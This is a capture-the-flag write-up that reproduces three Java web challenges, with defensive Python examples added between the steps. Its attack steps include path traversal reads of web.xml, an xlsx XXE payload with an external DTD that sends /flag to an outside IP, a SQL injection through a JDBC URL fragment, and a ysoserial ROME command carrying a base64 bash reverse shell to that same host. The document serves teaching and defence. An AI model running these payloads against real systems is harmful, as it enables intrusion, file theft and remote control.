Reproducing some Java web challenges

CTFWP · no tag · March 26, 2021

Preface

Reproductions of some Java-related challenges from BUUOJ (continuously updated).

[RoarCTF 2019]Easy Java

There is an arbitrary file read; use it to read WEB-INF/web.xml.

This gives web.xml:

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
        <url-pattern>/Login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>DownloadController</servlet-name>
        <servlet-class>com.wm.ctf.DownloadController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadController</servlet-name>
        <url-pattern>/Download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>

</web-app>

It reveals a /Flag route; use the file read to fetch FlagController.class.

Once retrieved, decompile it with an online decompiler:

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
   name = "FlagController"
)
public class FlagController extends HttpServlet {

   String flag = "ZmxhZ3s4NzBlMDVjMi03NGUwLTQwNjMtOGFkNy0xNmQ1MTUyMWVlNGR9Cg==";


   protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
      PrintWriter var3 = var2.getWriter();
      var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
   }
}

The flag is found (the base64 string in the flag field).

[网鼎杯 2020 青龙组]filejava

Entering the app, the download function has an arbitrary file read:

/DownloadServlet?filename=../../../../WEB-INF/web.xml

Read the web.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>
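Both Easy Java and filejava fall to the same defect: a download parameter is joined onto a directory without checking that the result stays inside it. The following is an added example (not the challenge's code, nor the author's) of how a download handler should resolve such a name, plus the detection check a log review would apply to the raw parameter. The directory paths are hypothetical.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Constructed layout for the demo (hypothetical paths, not the challenge's):
APP_ROOT = Path("/srv/webapp")
DOWNLOAD_DIR = APP_ROOT / "upload"     # the only directory downloads may be served from

# A download name is a bare file name: no separators, no leading dot, bounded length.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def resolve_download(filename, base_dir=DOWNLOAD_DIR):
    """Map a user-supplied download name to a file under base_dir.

    Returns the absolute Path to serve, or None when the request must be refused.
    Two independent checks are applied: the name allowlist, and a canonical-path
    containment check, so that a name the regex somehow let through still could
    not escape base_dir.
    """
    if not filename or not SAFE_NAME.fullmatch(filename):
        return None                       # rejects '/', '\\', NUL, '..', empty, leading dots
    base = Path(base_dir).resolve()
    candidate = (base / filename).resolve()
    if base not in candidate.parents:     # must be strictly inside base_dir
        return None
    return candidate


# Detection side: what a log review or WAF rule looks for in the raw 'filename'
# parameter. Decoded twice so double URL encoding does not hide the traversal.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|(^|/)WEB-INF(/|$))", re.IGNORECASE)


def looks_like_traversal(raw_param):
    decoded = unquote(unquote(raw_param))
    return TRAVERSAL.search(decoded) is not None
```

The canonical-path check matters even with the allowlist: if the allowlist is later loosened (say, to permit subdirectories), `resolve()` still collapses `..` and symlinks before the containment test, so WEB-INF stays unreachable.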

There are three servlets in total; read them all out and decompile them with JD-GUI.

The key part is in UploadServlet (upload.java):

// Only reached for uploads named excel-*.xlsx; the file is then handed to POI
if(filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook saveFilename = WorkbookFactory.create(in);   // POI parses the OOXML package here
        Sheet realSavePath = saveFilename.getSheetAt(0);
        System.out.println(realSavePath.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");   // reveals the POI version in use
        var20.printStackTrace();
    }
}

This reveals poi-ooxml-3.10, and that version happens to have an XXE vulnerability.

For details see https://xz.aliyun.com/t/6996#toc-3

The vulnerable code is only reached if the upload is an xlsx whose filename starts with excel-.

Create a new xlsx yourself, open it as an archive, and modify [Content_Types].xml:


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://47.97.123.81/xml.dtd">
%remote;%int;%send;]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

Then write xml.dtd on your own VPS:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://47.97.123.81:11452?p=%file;'>">

Then start a listener, upload the file, and the flag is sent back.
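The attack above works because POI 3.10 hands the package's XML parts to a parser that honours DOCTYPE declarations. The real fix is upgrading POI (or configuring the XML parser to refuse DTDs); as defense in depth, an upload handler can refuse any OOXML package whose XML parts carry a DTD before the parser ever sees it, since legitimate Office files never declare one. The following is an added example of that pre-check (not code from the challenge or the author); the sample packages are constructed in-memory and the DTD host name is a placeholder.

```python
import io
import re
import zipfile

# Any DOCTYPE or ENTITY declaration inside an OOXML part is suspicious: that is
# where external entities are defined, and real Office output never has them.
DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def find_dtd_parts(xlsx_bytes, max_part_size=10 * 1024 * 1024):
    """Return the names of zip members that contain DTD/entity declarations."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            # Only .xml and .rels parts are handed to an XML parser.
            if not name.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > max_part_size:     # refuse oversized parts (zip bombs)
                flagged.append(name)
                continue
            if DTD_MARKERS.search(zf.read(name)):
                flagged.append(name)
    return flagged


def is_safe_to_parse(xlsx_bytes):
    return not find_dtd_parts(xlsx_bytes)


def make_sample_xlsx(content_types_xml):
    """Build a minimal constructed xlsx-like package with the given [Content_Types].xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("_rels/.rels",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
        zf.writestr("xl/workbook.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>')
    return buf.getvalue()


# Constructed inputs: a clean content-types part, and one carrying a DTD that
# pulls in an external DTD (placeholder host, same shape as the writeup's payload).
BENIGN_TYPES = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                b'<Default Extension="xml" ContentType="application/xml"/></Types>')

MALICIOUS_TYPES = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   b'<!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://dtd.example.invalid/xml.dtd">%remote;]>'
                   b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
```

A byte-level grep like this is a cheap tripwire, not a parser-grade guarantee: an XML part declared in UTF-16 would not match the ASCII patterns, which is why the scan complements, rather than replaces, a parser configured to reject DTDs.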


[网鼎杯 2020 朱雀组]Think Java

The class files are provided directly; drag them into JD-GUI to audit.


Scanning finds swagger-ui.html.

It exposes three endpoints.


Judging by their functions, one queries the database, one handles login, and the third, current, actually deserializes the data passed to it.

To log in, the admin password has to be extracted via SQL injection.

Looking at the source, there is an obvious SQL injection, and the default database is myapp; querying it first confirms that it works.

jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#
is parsed by the JDBC driver as
jdbc:mysql://mysqldbserver:3306/myapp

but the raw value is then substituted into the SQL statement:
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '#' union select 1#' and table_name='" + TableName + "'
The first # is enclosed in single quotes and becomes an ordinary # character; the second # comments out the rest of the statement, producing SQL injection.

So the payload myapp#' union select pwd from user# works.
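The root cause is a parsing mismatch: the driver treats everything after # as a URL fragment and drops it, while the application reuses the unparsed string inside SQL. The following added example (not the challenge's code) models that mismatch with Python's URL parser, standing in for the JDBC driver's behaviour the writeup describes, and shows the hardened form: identifier allowlisting plus a parameterised query. The identifier regex is a simplified version of MySQL's rules and is an assumption of the example.

```python
import re
from urllib.parse import urlsplit

JDBC_PREFIX = "jdbc:"


def db_name_as_driver_sees_it(jdbc_url):
    """What a URL parser keeps: everything after '#' is a fragment and is dropped."""
    parts = urlsplit(jdbc_url[len(JDBC_PREFIX):])
    return parts.path.rsplit("/", 1)[-1]


def db_name_as_naive_code_sees_it(jdbc_url):
    """The raw substring after the last '/', fragment included: this is what
    lands inside the SQL string when the app reuses the unparsed input."""
    return jdbc_url.rsplit("/", 1)[-1]


def build_query_unsafe(schema, table):
    """The vulnerable pattern: identifiers concatenated straight into SQL."""
    return ("SELECT TABLE_COMMENT FROM INFORMATION_SCHEMA.TABLES "
            f"WHERE table_schema = '{schema}' AND table_name = '{table}'")


# Simplified MySQL identifier rule (assumption of this example): alphanumerics, '_' and '$'.
IDENTIFIER = re.compile(r"[A-Za-z0-9_$]{1,64}")


def build_query_safe(schema, table):
    """Hardened form: validate identifiers against an allowlist, then bind them
    as parameters so the driver, not string concatenation, handles quoting."""
    for ident in (schema, table):
        if not IDENTIFIER.fullmatch(ident):
            raise ValueError(f"rejected identifier: {ident!r}")
    sql = ("SELECT TABLE_COMMENT FROM INFORMATION_SCHEMA.TABLES "
           "WHERE table_schema = %s AND table_name = %s")
    return sql, (schema, table)
```

The allowlist is what actually closes the hole here: even with parameter binding, an application that lets the caller name the schema is handing out information-schema access, so the schema should come from configuration rather than from the request.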


With the credentials in hand, log in:

{"username":"admin","password":"admin@Rrrr_ctf_asde"}


After logging in, data is a Java-serialized blob: the Bearer token.

Submitting this blob to current returns "operation succeeded", which shows the endpoint deserializes it. So we construct our own serialized string.

The data has to be base64-decoded first and then converted to hex.

# The original used Python 2's str.encode('hex'); binascii.hexlify works on both Python 2 and 3
import base64
import binascii
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = binascii.hexlify(base64.b64decode(a)).decode()   # base64 -> raw bytes -> hex string
print(b)

The following signatures serve as markers of Java serialization:

If a blob begins with rO0AB, you can be almost certain it is base64-encoded Java serialized data.

And if it begins with aced, it is Java serialized data in hex.
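Those two prefixes are the base64 and hex forms of the stream header 0xACED 0x0005. A defender can go one step further without deserializing anything: read the header and the first class descriptor to learn which class the stream claims to be, then let only an allowlisted class through (the same idea as Java's ObjectInputFilter). The following is an added example (not the challenge's code or the author's) that does this for the token shown above; the allowlist is a constructed assumption for the demo.

```python
import base64
import binascii
import struct

STREAM_MAGIC = 0xACED
STREAM_VERSION = 0x0005
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# The Bearer token captured in the writeup above.
SAMPLE_TOKEN = ("rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0"
                "ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51"
                "bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu")

# Constructed allowlist: the only class this endpoint legitimately expects.
ALLOWED_CLASSES = {"cn.abc.core.model.UserVo"}


def decode_token(token):
    """Accept hex ('aced...'), base64 ('rO0AB...') or raw bytes; return bytes."""
    if isinstance(token, bytes):
        return token
    s = token.strip()
    if s[:4].lower() == "aced":
        return binascii.unhexlify(s)
    if s.startswith("rO0AB"):
        return base64.b64decode(s)
    raise ValueError("not a recognised Java serialization encoding")


def to_hex(token):
    return binascii.hexlify(decode_token(token)).decode("ascii")


def inspect_stream(token):
    """Read only the stream header and the first class descriptor.

    Nothing is deserialized: this is the pre-check a gateway or log parser can
    run to name the top-level class before the application touches the bytes.
    Returns None if the data is not a Java serialization stream.
    """
    data = decode_token(token)
    if len(data) < 4:
        return None
    magic, version = struct.unpack(">HH", data[:4])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        return None
    info = {"top_class": None, "serial_version_uid": None}
    # TC_OBJECT then an inline TC_CLASSDESC: class name as a modified-UTF string
    # (u2 length + bytes), followed by the 8-byte serialVersionUID.
    if len(data) >= 8 and data[4] == TC_OBJECT and data[5] == TC_CLASSDESC:
        (name_len,) = struct.unpack(">H", data[6:8])
        name_end = 8 + name_len
        if len(data) >= name_end + 8:
            info["top_class"] = data[8:name_end].decode("utf-8", "replace")
            (info["serial_version_uid"],) = struct.unpack(">q", data[name_end:name_end + 8])
    return info


def should_deserialize(token, allowed=ALLOWED_CLASSES):
    """Policy decision: only a well-formed stream whose top-level class is allowlisted passes."""
    info = inspect_stream(token)
    return info is not None and info["top_class"] in allowed
```

Run on the writeup's token this reports cn.abc.core.model.UserVo as the top-level class; a ysoserial gadget chain would name a different class, which is exactly what the allowlist refuses. Note the check only covers the first class descriptor, so it is a filter in front of the deserializer, not a substitute for a proper ObjectInputFilter that is consulted for every class in the stream.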

ysoserial can generate the payload:

https://github.com/frohoff/ysoserial

java -jar ysoserial-master-d367e379d9-1.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ny4xMjMuODEvMTE0NTEgMD4mMQ==}|{base64,-d}|{bash,-i}" |base64

This pops a shell directly.

For Java, this form of reverse shell seems to work best; nc and curl did not work.


© 2023 Yang_99的小窝. Using Typecho & Moricolor.